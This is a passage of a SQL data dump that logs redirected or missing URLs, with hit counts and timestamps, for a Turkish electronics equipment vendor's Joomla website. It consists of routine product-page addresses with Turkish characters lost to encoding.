00:00:00',301),(41070,'https://3s-technologies.com.tr/index.php/en/products/b?lgesel-lehimleme/by,mf_name',NULL,'','',5,0,'2025-06-26 19:13:26','0000-00-00 00:00:00',301),(41071,'https://3s-technologies.com.tr/index.php/en/products/b?lgesel-lehimleme/by,ordering',NULL,'','',4,0,'2025-06-26 19:13:33','0000-00-00 00:00:00',301),(41072,'https://3s-technologies.com.tr/index.php/en/products/b?lgesel-lehimleme/by,product_name',NULL,'','',4,0,'2025-06-26 19:13:41','0000-00-00 00:00:00',301),(41073,'https://3s-technologies.com.tr/index.php/en/products/b?lgesel-lehimleme/by,product_name/dirdesc',NULL,'','',4,0,'2025-06-26 19:13:45','0000-00-00 00:00:00',301),(41074,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?language=en-gb',NULL,'','',43,0,'2025-06-26 19:35:14','0000-00-00 00:00:00',301),(41075,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f??n/by,`p`.product_sku?language=en-gb',NULL,'','',4,0,'2025-06-26 19:35:18','0000-00-00 00:00:00',301),(41076,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f??n/by,category_name',NULL,'','',4,0,'2025-06-26 19:35:22','0000-00-00 00:00:00',301),(41077,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f??n/by,category_name/dirdesc',NULL,'','',4,0,'2025-06-26 19:35:26','0000-00-00 00:00:00',301),(41078,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f??n/by,category_name/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-26 19:35:29','0000-00-00 00:00:00',301),(41079,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f??n/by,category_name?language=en-gb',NULL,'','',4,0,'2025-06-26 19:35:33','0000-00-00 00:00:00',301),(41080,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/?ubuk-lehim',NULL,'','',4,0,'2025-06-26 19:41:20','0000-00-00 00:00:00',301),(41081,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-f??n',NULL,'','',7,0,'2025-06-26 20:07:53','0000-00-00 00:00:00',301),(41082,'http://3s-technologies.com.tr/en/products/smd-d????k-h??zl??/ls60v-detail/askquestion?tmpl=component',NULL,'','',1,0,'2025-06-26 20:27:05','0000-00-00 00:00:00',301),(41083,'http://3s-technologies.com.tr/en/products/smd-f?r??n/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',2,0,'2025-06-26 20:27:13','0000-00-00 00:00:00',301),(41084,'https://3s-technologies.com.tr/index.php/en/products/b?lgesel-lehimleme/by,product_sku',NULL,'','',4,0,'2025-06-26 20:27:34','0000-00-00 00:00:00',301),(41085,'https://3s-technologies.com.tr/index.php/en/products/b?lgesel-lehimleme/dirdesc',NULL,'','',5,0,'2025-06-26 20:30:48','0000-00-00 00:00:00',301),(41086,'https://3s-technologies.com.tr/index.php/en/products/b?lgesel-lehimleme/ess-310-24-detail',NULL,'','',5,0,'2025-06-26 20:30:54','0000-00-00 00:00:00',301),(41087,'https://3s-technologies.com.tr/index.php/en/products/b?tmpl=component',NULL,'','',9,0,'2025-06-26 20:30:58','0000-00-00 00:00:00',301),(41088,'https://3s-technologies.com.tr/index.php/en/products/b?lgesel-lehimleme/ess-310-detail',NULL,'','',5,0,'2025-06-26 20:31:01','0000-00-00 00:00:00',301),(41089,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim',NULL,'','',5,0,'2025-06-26 20:31:04','0000-00-00 00:00:00',301),(41090,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,`p`.product_sku',NULL,'','',5,0,'2025-06-26 20:31:07','0000-00-00 00:00:00',301),(41091,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,`p`.product_sku/dirdesc',NULL,'','',5,0,'2025-06-26 20:31:11','0000-00-00 00:00:00',301),(41092,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,category_name',NULL,'','',5,0,'2025-06-26 20:31:21','0000-00-00 00:00:00',301),(41093,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,category_name/dirdesc',NULL,'','',5,0,'2025-06-26 20:31:24','0000-00-00 00:00:00',301),(41094,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,mf_name',NULL,'','',5,0,'2025-06-26 20:31:35','0000-00-00 00:00:00',301),(41095,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,mf_name/dirdesc',NULL,'','',5,0,'2025-06-26 20:31:38','0000-00-00 00:00:00',301),(41096,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,ordering',NULL,'','',4,0,'2025-06-26 20:31:49','0000-00-00 00:00:00',301),(41097,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,product_name',NULL,'','',4,0,'2025-06-26 20:31:56','0000-00-00 00:00:00',301),(41098,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim/by,product_name/dirdesc',NULL,'','',5,0,'2025-06-26 20:31:59','0000-00-00 00:00:00',301),(41099,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim/dirdesc',NULL,'','',5,0,'2025-06-26 20:32:10','0000-00-00 00:00:00',301),(41100,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim/e-bar-26-detail',NULL,'','',5,0,'2025-06-26 20:32:17','0000-00-00 00:00:00',301),(41101,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?ubuk-lehim/e-bar-detail',NULL,'','',5,0,'2025-06-26 20:32:21','0000-00-00 00:00:00',301),(41102,'https://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/?tmpl=component',NULL,'','',6,0,'2025-06-26 20:32:25','0000-00-00 00:00:00',301),(41103,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f??n',NULL,'','',3,0,'2025-06-26 20:32:33','0000-00-00 00:00:00',301),(41104,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f??n/by,`p`.product_sku',NULL,'','',3,0,'2025-06-26 20:32:36','0000-00-00 00:00:00',301),(41105,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f??n/by,`p`.product_sku/dirdesc',NULL,'','',3,0,'2025-06-26 20:32:40','0000-00-00 00:00:00',301),(41106,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f??n/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-26 20:32:44','0000-00-00 00:00:00',301),(41107,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f??n/by,mf_name',NULL,'','',3,0,'2025-06-26 20:32:48','0000-00-00 00:00:00',301),(41108,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f??n/by,mf_name/dirdesc',NULL,'','',3,0,'2025-06-26 20:32:52','0000-00-00 00:00:00',301),(41109,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f??n/by,mf_name/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-26 20:32:56','0000-00-00 00:00:00',301),(41110,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f??n/by,mf_name?language=en-gb',NULL,'','',4,0,'2025-06-26 20:32:59','0000-00-00 00:00:00',301),(41111,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f??n/by,ordering',NULL,'','',4,0,'2025-06-26 20:33:03','0000-00-00 00:00:00',301),(41112,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f??n/by,ordering?language=en-gb',NULL,'','',4,0,'2025-06-26 20:33:07','0000-00-00 00:00:00',301),(41113,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f??n/by,product_name',NULL,'','',4,0,'2025-06-26 20:33:11','0000-00-00 00:00:00',301),(41114,'http://3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/le-40v-detail/askquestion?tmpl=component',NULL,'','',2,0,'2025-06-26 21:55:53','0000-00-00 00:00:00',301),(41115,'http://3s-technologies.com.tr/en/products/smd-f?r??n/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-26 21:55:55','0000-00-00 00:00:00',301),(41116,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/smd-f??n/by,product_name/dirdesc',NULL,'','',4,0,'2025-06-26 21:57:28','0000-00-00 00:00:00',301),(41117,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-h?z/by,mf_name',NULL,'','',4,0,'2025-06-26 22:59:57','0000-00-00 00:00:00',301),(41118,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h??/by,product_name/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-26 23:00:01','0000-00-00 00:00:00',301),(41119,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h??/by,product_name?language=en-gb',NULL,'','',2,0,'2025-06-26 23:00:04','0000-00-00 00:00:00',301),(41120,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h??/by,product_sku',NULL,'','',2,0,'2025-06-26 23:00:08','0000-00-00 00:00:00',301),(41121,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h??/by,product_sku?language=en-gb',NULL,'','',2,0,'2025-06-26 23:00:12','0000-00-00 00:00:00',301),(41122,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-h??/dirdesc',NULL,'','',2,0,'2025-06-26 23:00:15','0000-00-00 00:00:00',301),(41123,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f??n',NULL,'','',1,0,'2025-06-27 01:38:50','0000-00-00 00:00:00',301),(41124,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,`p`.product_sku/dirdesc',NULL,'','',4,0,'2025-06-27 01:38:52','0000-00-00 00:00:00',301),(41125,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,mf_name',NULL,'','',4,0,'2025-06-27 01:38:54','0000-00-00 00:00:00',301),(41126,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,mf_name?language=en-gb',NULL,'','',1,0,'2025-06-27 01:38:56','0000-00-00 00:00:00',301),(41127,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,ordering',NULL,'','',1,0,'2025-06-27 01:38:58','0000-00-00 00:00:00',301),(41128,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,ordering?language=en-gb',NULL,'','',1,0,'2025-06-27 01:39:00','0000-00-00 00:00:00',301),(41129,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-27 01:39:01','0000-00-00 00:00:00',301),(41130,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2025-06-27 01:39:03','0000-00-00 00:00:00',301),(41131,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,product_name',NULL,'','',1,0,'2025-06-27 01:39:05','0000-00-00 00:00:00',301),(41132,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-27 01:39:07','0000-00-00 00:00:00',301),(41133,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-27 01:39:09','0000-00-00 00:00:00',301),(41134,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,product_sku',NULL,'','',1,0,'2025-06-27 01:39:10','0000-00-00 00:00:00',301),(41135,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,product_sku?language=en-gb',NULL,'','',1,0,'2025-06-27 01:39:12','0000-00-00 00:00:00',301),(41136,'http://3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,mf_name',NULL,'','',1,0,'2025-06-27 01:39:14','0000-00-00 00:00:00',301),(41137,'http://3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-27 01:39:16','0000-00-00 00:00:00',301),(41138,'http://3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-27 01:39:18','0000-00-00 00:00:00',301),(41139,'http://3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,mf_name?language=en-gb',NULL,'','',1,0,'2025-06-27 01:39:20','0000-00-00 00:00:00',301),(41140,'http://3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,ordering',NULL,'','',1,0,'2025-06-27 01:39:22','0000-00-00 00:00:00',301),(41141,'http://3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,ordering?language=en-gb',NULL,'','',1,0,'2025-06-27 01:39:23','0000-00-00 00:00:00',301),(41142,'http://3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,pc.ordering,product_name',NULL,'','',1,0,'2025-06-27 01:39:25','0000-00-00 00:00:00',301),(41143,'http://3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,pc.ordering,product_name/dirdesc',NULL,'','',1,0,'2025-06-27 01:39:27','0000-00-00 00:00:00',301),(41144,'http://3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-27 01:39:29','0000-00-00 00:00:00',301),(41145,'http://3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,pc.ordering,product_name?language=en-gb',NULL,'','',1,0,'2025-06-27 01:39:31','0000-00-00 00:00:00',301),(41146,'http://3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,product_name',NULL,'','',1,0,'2025-06-27 01:39:32','0000-00-00 00:00:00',301),(41147,'http://3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-27 01:39:34','0000-00-00 00:00:00',301),(41148,'http://3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-27 01:39:36','0000-00-00 00:00:00',301),(41149,'http://3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,product_name?language=en-gb',NULL,'','',1,0,'2025-06-27 01:39:38','0000-00-00 00:00:00',301),(41150,'http://3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,product_sku',NULL,'','',1,0,'2025-06-27 01:39:40','0000-00-00 00:00:00',301),(41151,'http://3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/by,product_sku?language=en-gb',NULL,'','',1,0,'2025-06-27 01:39:42','0000-00-00 00:00:00',301),(41152,'http://3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/cs40-detail',NULL,'','',1,0,'2025-06-27 01:39:43','0000-00-00 00:00:00',301),(41153,'http://3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/dirdesc',NULL,'','',1,0,'2025-06-27 01:39:45','0000-00-00 00:00:00',301),(41154,'http://3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-27 01:39:47','0000-00-00 00:00:00',301),(41155,'http://3s-technologies.com.tr/en/products/smd-d?????k-h??zl???language=en-gb',NULL,'','',1,0,'2025-06-27 01:39:49','0000-00-00 00:00:00',301),(41156,'http://3s-technologies.com.tr/en/products/smd-f?r??n/by,`p`.product_sku',NULL,'','',1,0,'2025-06-27 01:39:51','0000-00-00 00:00:00',301),(41157,'http://3s-technologies.com.tr/en/products/smd-f?r??n/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-27 01:39:53','0000-00-00 00:00:00',301),(41158,'http://3s-technologies.com.tr/en/products/smd-f?r??n/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-27 01:39:54','0000-00-00 00:00:00',301),(41159,'http://3s-technologies.com.tr/en/products/smd-f?r??n/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-27 01:39:56','0000-00-00 00:00:00',301),(41160,'http://3s-technologies.com.tr/en/products/smd-f?r??n/by,category_name',NULL,'','',1,0,'2025-06-27 01:39:58','0000-00-00 00:00:00',301),(41161,'http://3s-technologies.com.tr/en/products/smd-f?r??n/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-27 01:40:00','0000-00-00 00:00:00',301),(41162,'http://3s-technologies.com.tr/en/products/smd-f?r??n/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-27 01:40:01','0000-00-00 00:00:00',301),(41163,'http://3s-technologies.com.tr/en/products/smd-f?r??n/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-27 01:40:03','0000-00-00 00:00:00',301),(41164,'http://3s-technologies.com.tr/en/products/smd-f?r??n/by,mf_name',NULL,'','',1,0,'2025-06-27 01:40:05','0000-00-00 00:00:00',301),(41165,'http://3s-technologies.com.tr/en/products/smd-f?r??n/by,mf_name/dirdesc',NULL,'','',1,0,'2025-06-27 01:40:07','0000-00-00 00:00:00',301),(41166,'http://3s-technologies.com.tr/en/products/smd-f?r??n/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-27 01:40:09','0000-00-00 00:00:00',301),(41167,'http://3s-technologies.com.tr/includes/upload/',NULL,'','',1,0,'2025-06-27 02:42:34','0000-00-00 00:00:00',301),(41168,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?language=en-gb',NULL,'','',1,0,'2025-06-27 04:58:35','0000-00-00 00:00:00',301),(41169,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,category_name',NULL,'','',1,0,'2025-06-27 04:58:37','0000-00-00 00:00:00',301),(41170,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,category_name/dirdesc',NULL,'','',1,0,'2025-06-27 04:58:39','0000-00-00 00:00:00',301),(41171,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-27 04:58:42','0000-00-00 00:00:00',301),(41172,'http://3s-technologies.com.tr/en/products/smd-d?????k-h??zl??/ls60v-detail',NULL,'','',1,0,'2025-06-27 04:58:50','0000-00-00 00:00:00',301),(41173,'http://3s-technologies.com.tr/en/products/smd-f?r??n/by,product_name',NULL,'','',1,0,'2025-06-27 04:58:53','0000-00-00 00:00:00',301),(41174,'http://3s-technologies.com.tr/en/products/smd-f?r??n/by,product_name/dirdesc',NULL,'','',1,0,'2025-06-27 04:58:55','0000-00-00 00:00:00',301),(41175,'http://3s-technologies.com.tr/en/products/smd-f?r??n/ly-8c-detail',NULL,'','',3,0,'2025-06-27 04:59:05','0000-00-00 00:00:00',301),(41176,'http://3s-technologies.com.tr/en/products/smd-f?r??n?language=en-gb',NULL,'','',3,0,'2025-06-27 04:59:09','0000-00-00 00:00:00',301),(41177,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/dirdesc',NULL,'','',4,0,'2025-06-27 06:29:51','0000-00-00 00:00:00',301),(41178,'http://3s-technologies.com.tr/en/products/manufacturer/smd-ultra-h?z/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-27 06:29:53','0000-00-00 00:00:00',301),(41179,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,`p`.product_sku?language=en-gb',NULL,'','',1,0,'2025-06-27 06:29:56','0000-00-00 00:00:00',301),(41180,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,category_name?language=en-gb',NULL,'','',1,0,'2025-06-27 06:29:58','0000-00-00 00:00:00',301),(41181,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/smd-f?r??n/by,mf_name/dirdesc',NULL,'','',3,0,'2025-06-27 06:30:02','0000-00-00 00:00:00',301),(41182,'http://3s-technologies.com.tr/tr/index/function.php/img',NULL,'','',13,0,'2025-06-27 07:19:34','0000-00-00 00:00:00',301),(41183,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-f??n/by,`p`.product_sku',NULL,'','',5,0,'2025-06-27 07:27:00','0000-00-00 00:00:00',301),(41184,'https://3s-technologies.com.tr/en/wood-processing-ah?ap-i??leme',NULL,'','',6,0,'2025-06-27 08:32:02','0000-00-00 00:00:00',301),(41185,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-f??n/by,`p`.product_sku?language=en-gb',NULL,'','',5,0,'2025-06-27 09:07:57','0000-00-00 00:00:00',301),(41186,'https://3s-technologies.com.tr/en/akrilik-i?leme-acrylic-processing/akrilik-oyma-acrylic-engraving',NULL,'','',5,0,'2025-06-27 11:32:56','0000-00-00 00:00:00',301),(41187,'https://3s-technologies.com.tr/en/aluminyum-i?leme-aluminum-processing/aluminyum-i??leme-aluminum-processing',NULL,'','',5,0,'2025-06-27 11:32:58','0000-00-00 00:00:00',301),(41188,'https://3s-technologies.com.tr/en/pcb-prototip-prototyping/pcb-kaz?ma-milling',NULL,'','',5,0,'2025-06-27 11:33:00','0000-00-00 00:00:00',301),(41189,'https://3s-technologies.com.tr/en/pcb-prototip-prototyping/pcb-y?kseklik-self-levelling',NULL,'','',5,0,'2025-06-27 11:33:02','0000-00-00 00:00:00',301),(41190,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n',NULL,'','',1,0,'2025-06-27 11:33:06','0000-00-00 00:00:00',301),(41191,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,`p`.product_sku',NULL,'','',1,0,'2025-06-27 11:33:08','0000-00-00 00:00:00',301),(41192,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2025-06-27 11:33:11','0000-00-00 00:00:00',301),(41193,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-27 11:33:13','0000-00-00 00:00:00',301),(41194,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,category_name',NULL,'','',1,0,'2025-06-27 11:33:16','0000-00-00 00:00:00',301),(41195,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/smd-f?r??n/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2025-06-27 11:33:19','0000-00-00 00:00:00',301),(41196,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,ordering?language=en-gb',NULL,'','',4,0,'2025-06-27 11:33:21','0000-00-00 00:00:00',301),(41197,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,pc.ordering,product_name',NULL,'','',4,0,'2025-06-27 11:33:23','0000-00-00 00:00:00',301),(41198,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,pc.ordering,product_name/dirdesc',NULL,'','',3,0,'2025-06-27 11:33:27','0000-00-00 00:00:00',301),(41199,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-27 11:33:29','0000-00-00 00:00:00',301),(41200,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,pc.ordering,product_name?language=en-gb',NULL,'','',4,0,'2025-06-27 11:33:33','0000-00-00 00:00:00',301),(41201,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,product_name',NULL,'','',4,0,'2025-06-27 11:33:36','0000-00-00 00:00:00',301),(41202,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,product_name/dirdesc',NULL,'','',4,0,'2025-06-27 11:33:39','0000-00-00 00:00:00',301),(41203,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,product_name/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-27 11:33:42','0000-00-00 00:00:00',301),(41204,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,product_sku',NULL,'','',4,0,'2025-06-27 11:33:45','0000-00-00 00:00:00',301),(41205,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,product_sku?language=en-gb',NULL,'','',2,0,'2025-06-27 11:33:47','0000-00-00 00:00:00',301),(41206,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/dirdesc',NULL,'','',1,0,'2025-06-27 11:33:49','0000-00-00 00:00:00',301),(41207,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-27 11:33:53','0000-00-00 00:00:00',301),(41208,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl???language=en-gb',NULL,'','',2,0,'2025-06-27 11:33:56','0000-00-00 00:00:00',301),(41209,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z',NULL,'','',2,0,'2025-06-27 11:34:00','0000-00-00 00:00:00',301),(41210,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,`p`.product_sku',NULL,'','',3,0,'2025-06-27 11:34:03','0000-00-00 00:00:00',301),(41211,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,category_name/dirdesc',NULL,'','',2,0,'2025-06-27 11:34:05','0000-00-00 00:00:00',301),(41212,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,category_name/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-27 11:34:08','0000-00-00 00:00:00',301),(41213,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,category_name?language=en-gb',NULL,'','',3,0,'2025-06-27 11:34:11','0000-00-00 00:00:00',301),(41214,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,mf_name',NULL,'','',4,0,'2025-06-27 11:34:14','0000-00-00 00:00:00',301),(41215,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,mf_name/dirdesc',NULL,'','',3,0,'2025-06-27 11:34:17','0000-00-00 00:00:00',301),(41216,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,mf_name/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-27 11:34:19','0000-00-00 00:00:00',301),(41217,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,mf_name?language=en-gb',NULL,'','',3,0,'2025-06-27 11:34:23','0000-00-00 00:00:00',301),(41218,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,ordering',NULL,'','',4,0,'2025-06-27 11:34:27','0000-00-00 00:00:00',301),(41219,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,ordering?language=en-gb',NULL,'','',4,0,'2025-06-27 11:34:30','0000-00-00 00:00:00',301),(41220,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,pc.ordering,product_name',NULL,'','',4,0,'2025-06-27 11:34:33','0000-00-00 00:00:00',301),(41221,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,pc.ordering,product_name/dirdesc',NULL,'','',4,0,'2025-06-27 11:34:37','0000-00-00 00:00:00',301),(41222,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-27 11:34:40','0000-00-00 00:00:00',301),(41223,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,pc.ordering,product_name?language=en-gb',NULL,'','',4,0,'2025-06-27 11:34:46','0000-00-00 00:00:00',301),(41224,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,product_name',NULL,'','',4,0,'2025-06-27 11:34:50','0000-00-00 00:00:00',301),(41225,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,product_name/dirdesc',NULL,'','',4,0,'2025-06-27 11:34:54','0000-00-00 00:00:00',301),(41226,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,product_name/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-27 11:34:57','0000-00-00 00:00:00',301),(41227,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,product_name?language=en-gb',NULL,'','',4,0,'2025-06-27 11:35:00','0000-00-00 00:00:00',301),(41228,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z?language=en-gb',NULL,'','',4,0,'2025-06-27 11:35:03','0000-00-00 